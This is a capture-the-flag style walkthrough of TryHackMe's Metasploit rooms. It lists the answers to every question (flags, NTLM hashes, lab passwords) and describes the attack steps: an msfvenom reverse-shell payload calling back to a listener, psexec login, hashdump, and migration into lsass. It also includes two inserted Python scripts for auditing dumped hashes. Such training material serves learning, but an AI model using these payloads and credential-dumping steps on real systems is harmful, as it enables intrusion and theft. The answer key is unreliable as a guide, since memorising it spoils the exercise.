TryHackMe — Jr Penetration Tester — Metasploit

Deepak Kushwah
6 min read · Oct 31, 2021

Room 1 - Metasploit: Introduction

Task 1 Introduction to Metasploit

Read only task!!

Task 2 Main Components of Metasploit

Answer the questions below

Q 1. What is the name of the code taking advantage of a flaw on the target system?

Ans. Exploit

Q 2. What is the name of the code that runs on the target system to achieve the attacker’s goal?

Ans. Payload

Q 3. What are self-contained payloads called?

Ans. Singles

Q 4. Is “windows/x64/pingback_reverse_tcp” a single or a staged payload?

Ans. Singles

Task 3 Msfconsole

Answer the questions below

Q 1. How would you search for a module related to Apache?

Ans. search apache

Q 2. Who provided the auxiliary/scanner/ssh/ssh_login module?

Ans. todb

Task 4 Working with modules

Answer the questions below

Q 1. How would you set the LPORT value to 6666?

Ans. set LPORT 6666

Q 2. How would you set the global value for RHOSTS to 10.10.19.23 ?

Ans. setg RHOSTS 10.10.19.23

Q 3. What command would you use to clear a set payload?

Ans. unset PAYLOAD

Q 4. What command do you use to proceed with the exploitation phase?

Ans. exploit

Room 2 - Metasploit: Exploitation

Task 1 Introduction

Read Only Task!!

Task 2 Scanning

Answer the questions below

Q 1. How many ports are open on the target system?

Ans. 5

Q 2. Using the relevant scanner, what NetBIOS name can you see?

Ans. ACME IT SUPPORT

Q 3. What is running on port 8000?

Ans. webfs/1.21

Q 4. What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.

Ans. leo1234

Task 3 The Metasploit Database

Read Only Task!!

Task 4 Vulnerability Scanning

Q 1. Who wrote the module that allows us to check SMTP servers for open relay?

Ans. Campbell Murray

Task 5 Exploitation

Q 1. What is the content of the flag.txt file?

Ans. THM-5455554845

Enumeration: run Nmap to check for open services.

To look for known vulnerabilities on the SMB port: nmap -p445 --script vuln <target>

Search for a matching exploit module and try it with a reverse shell payload.

After selecting the payload, set RHOST to the target IP and run exploit; this gives us Windows CMD access.

After digging through the directories we found flag.txt.

Q2. What is the NTLM hash of the password of the user “pirate”?

Ans. 8ce9a3ebd1647fcc5e04025019f4b875

Use search hashdump to find the module.

Run post/windows/gather/hashdump.
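The NT hashes that hashdump returns are the artefact an administrator most wants to review after an exercise like this one. The following is an added example, not code from the original write-up or from Metasploit, that parses pwdump-style lines of the form user:rid:lm_hash:nt_hash::: and flags the storage weaknesses a defender would fix: accounts with an empty password, LM hashes still being kept, and the same password shared by several accounts. The sample lines, user names and RIDs are constructed; the two constants are the well-known values Windows stores for "no LM hash" and for the empty NT password.

```python
"""Audit pwdump-style hashdump output for weak credential storage.

Added example for this write-up; not code from the original post or from
Metasploit. Input format (one account per line): user:rid:lm_hash:nt_hash:::
"""
from collections import defaultdict

# Value Windows stores in the LM field when LM hashing is disabled ("no LM hash").
LM_DISABLED = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty password (MD4 of zero bytes).
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample; user names, RIDs and hashes are illustrative only.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
jdoe:1002:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
asmith:1003:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""


def parse_hashdump(text):
    """Parse hashdump lines into dicts; reject lines that do not fit the format."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed hashdump line: {raw!r}")
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not rid.isdigit() or len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"bad RID or hash length in line: {raw!r}")
        entries.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt})
    return entries


def audit(entries):
    """Return (account, finding) pairs an administrator should act on."""
    findings = []
    users_by_nt = defaultdict(list)
    for e in entries:
        if e["nt"] == NT_EMPTY:
            findings.append((e["user"], "empty password"))
        if e["lm"] != LM_DISABLED:
            findings.append((e["user"], "LM hash stored (legacy, trivially crackable)"))
        users_by_nt[e["nt"]].append(e["user"])
    # Identical NT hashes mean identical passwords: NT hashes are unsalted.
    for nt, users in users_by_nt.items():
        if len(users) > 1 and nt != NT_EMPTY:
            findings.append((",".join(sorted(users)), "shared password (identical NT hash)"))
    return findings


if __name__ == "__main__":
    for account, finding in audit(parse_hashdump(SAMPLE_HASHDUMP)):
        print(f"{account}: {finding}")
```

The shared-password check works only because the NT hash is unsalted, which is also the reason a single leaked hash is so damaging: the same check an auditor runs here is available to anyone holding the dump.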

Task 6 Msfvenom

Q 1. What is the other user’s password hash?

Ans. 6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0

Steps: create a Meterpreter payload in .elf format:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.78.250 LPORT=4444 -f elf > rev_shell.elf

Now start a web server with Python's http.server module to transfer the payload to the target machine.

We will use the multi/handler module to receive the incoming connection. It is selected with the use exploit/multi/handler command.

Once everything is set (PAYLOAD, LHOST and LPORT matching the msfvenom options), we will run the handler and wait for the incoming connection.

Now run the uploaded reverse shell payload on the target machine to get a Meterpreter session.

To get the password hash, run post/linux/gather/hashdump.
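The value returned by post/linux/gather/hashdump is a crypt(3)-style field from /etc/shadow, and its prefix, salt and digest carry what an administrator reviewing an exposed shadow file wants to know: which hashing algorithm is in use, whether the iteration count was raised, and whether any account is locked or has no password at all. The following is an added example, not code from the original write-up or from Metasploit, that parses shadow-format lines, classifies each password field and lists the weak ones. All sample lines and user names are constructed; the sha512crypt value reuses the salt and digest quoted in the answer above, with the leading $6$ that identifies the algorithm.

```python
"""Classify /etc/shadow-style password fields, such as the sha512crypt value
post/linux/gather/hashdump returns.

Added example for this write-up; not code from the original post or from
Metasploit. Sample lines are constructed (the sha512crypt salt and digest are
the ones quoted in the Task 6 answer, prefixed with the "$6$" algorithm marker).
"""

# crypt(3) identifier -> (algorithm name, considered weak today)
ALGORITHMS = {
    "1": ("md5crypt", True),
    "2a": ("bcrypt", False),
    "2b": ("bcrypt", False),
    "2y": ("bcrypt", False),
    "5": ("sha256crypt", False),
    "6": ("sha512crypt", False),
    "7": ("scrypt", False),
    "y": ("yescrypt", False),
    "gy": ("gost-yescrypt", False),
}
# Digest length (crypt base64 characters) for algorithms where it is fixed.
DIGEST_LEN = {"1": 22, "5": 43, "6": 86}
SHACRYPT_DEFAULT_ROUNDS = 5000

SAMPLE_SHADOW = "\n".join([
    "svcuser:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0:18931:0:99999:7:::",
    "daemon:*:18931:0:99999:7:::",                                     # locked system account
    "legacy:$1$abcdefgh$0123456789abcdefghijkl:18931:0:99999:7:::",    # md5crypt, constructed digest
    "kiosk::18931:0:99999:7:::",                                       # empty password field
    "admin:$6$rounds=100000$saltsalt$" + "A" * 86 + ":18931:0:99999:7:::",  # placeholder digest
    "ops:$y$j9T$Q/hXzbM8eR2kR7s3uJb3i0$HqUBS.pAzPaN4vzOdkbyTjJ0zF7HqQZHPbRmCwVe6y3:18931:0:99999:7:::",
])


def classify_password_field(field):
    """Describe one shadow password field: no password, locked, or a parsed hash."""
    if field == "":
        return {"state": "no-password", "weak": True}
    if field[0] in "!*":
        # '!' or '*' prefix: password login is disabled for this account
        return {"state": "locked", "weak": False}
    if not field.startswith("$"):
        # Traditional DES crypt is 13 characters with no '$' marker: 2-char salt + 11-char digest
        if len(field) == 13:
            return {"state": "hashed", "algorithm": "descrypt", "salt": field[:2],
                    "hash": field[2:], "rounds": None, "weak": True}
        return {"state": "unknown", "weak": True}

    parts = field.split("$")  # ['', id, [params...], salt, digest]
    ident = parts[1]
    if ident not in ALGORITHMS:
        return {"state": "unknown", "algorithm": ident, "weak": True}
    name, weak = ALGORITHMS[ident]
    rounds = None
    if name == "bcrypt":
        # $2b$<cost>$<22-char salt><31-char digest>: salt and digest are not '$'-separated
        cost, blob = parts[2], parts[3]
        if len(blob) != 53:
            raise ValueError("bcrypt salt+digest must be 53 characters")
        rounds = 2 ** int(cost)
        salt, digest = blob[:22], blob[22:]
    else:
        salt, digest = parts[-2], parts[-1]
        params = parts[2:-2]  # e.g. ['rounds=100000'] for sha*crypt, ['j9T'] for yescrypt
        if ident in ("5", "6"):
            rounds = SHACRYPT_DEFAULT_ROUNDS
            for p in params:
                if p.startswith("rounds="):
                    rounds = int(p[len("rounds="):])
        if ident in DIGEST_LEN and len(digest) != DIGEST_LEN[ident]:
            raise ValueError(f"{name} digest should be {DIGEST_LEN[ident]} chars, got {len(digest)}")
    return {"state": "hashed", "algorithm": name, "salt": salt,
            "hash": digest, "rounds": rounds, "weak": weak}


def audit_shadow(text):
    """Map each account in shadow-format text to its classified password field."""
    report = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"expected 9 colon-separated fields: {raw!r}")
        report[fields[0]] = classify_password_field(fields[1])
    return report


def weak_accounts(report):
    """Accounts whose password field is empty, unknown or uses a weak algorithm."""
    return sorted(user for user, info in report.items() if info["weak"])


if __name__ == "__main__":
    for user, info in audit_shadow(SAMPLE_SHADOW).items():
        print(user, info)
    print("weak:", weak_accounts(audit_shadow(SAMPLE_SHADOW)))
```

Unlike the NT hash, every entry here is salted and iterated, so two accounts with the same password do not produce the same field; the useful checks are the algorithm, the round count and the empty or unknown fields, which is what the audit reports.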

Task 7 Summary

Read Only Task!!

Room 3 - Metasploit: Meterpreter

Task 1 Introduction to Meterpreter

Read only Task!!

Task 2 Meterpreter Flavors

Read only Task!!

Task 3 Meterpreter Commands

Read only Task!!

Task 4 Post-Exploitation with Meterpreter

Read only Task!!

Task 5 Post-Exploitation Challenge

Statement: the questions below will help you have a better understanding of how Meterpreter can be used in post-exploitation.

You can use the credentials below to simulate an initial compromise over SMB (Server Message Block) (using exploit/windows/smb/psexec)

Username: ballen

Password: Password1

Solution:

Run use exploit/windows/smb/psexec in Metasploit.

Set RHOST to <Target_Machine_IP>, and set SMBUser and SMBPass to the credentials above (make sure the payload is set to windows/meterpreter/reverse_tcp and the listener is running in the background).

After exploiting we get a Meterpreter session.

Answer the questions below

Q 1 . What is the computer name?

Ans. ACME-TEST

Q 2. What is the target domain?

Ans. FLASH

Q 3. What is the name of the share likely created by the user?

Ans. speedster

Background the Meterpreter session with the background command.

Use the module post/windows/gather/enum_shares.

Set SESSION to the ID of the backgrounded session.

Then run the module.

Q 4. What is the NTLM hash of the jchambers user?

Ans. 69596c7aa1e8daee17f8e78870e25a5c

Migrate to the lsass.exe process (Local Security Authority Subsystem Service).

Q 5. What is the cleartext password of the jchambers user?

Ans. Trustno1

Q 6. Where is the “secrets.txt” file located?

Ans. c:\Program Files (x86)\Windows Multimedia Platform

Q 7. What is the Twitter password revealed in the “secrets.txt” file?

Ans. KDSvbsw3849!

Q 8. Where is the “realsecret.txt” file located?

Ans. c:\inetpub\wwwroot\

Q 9. What is the real secret?

Ans. The Flash is the fastest man alive
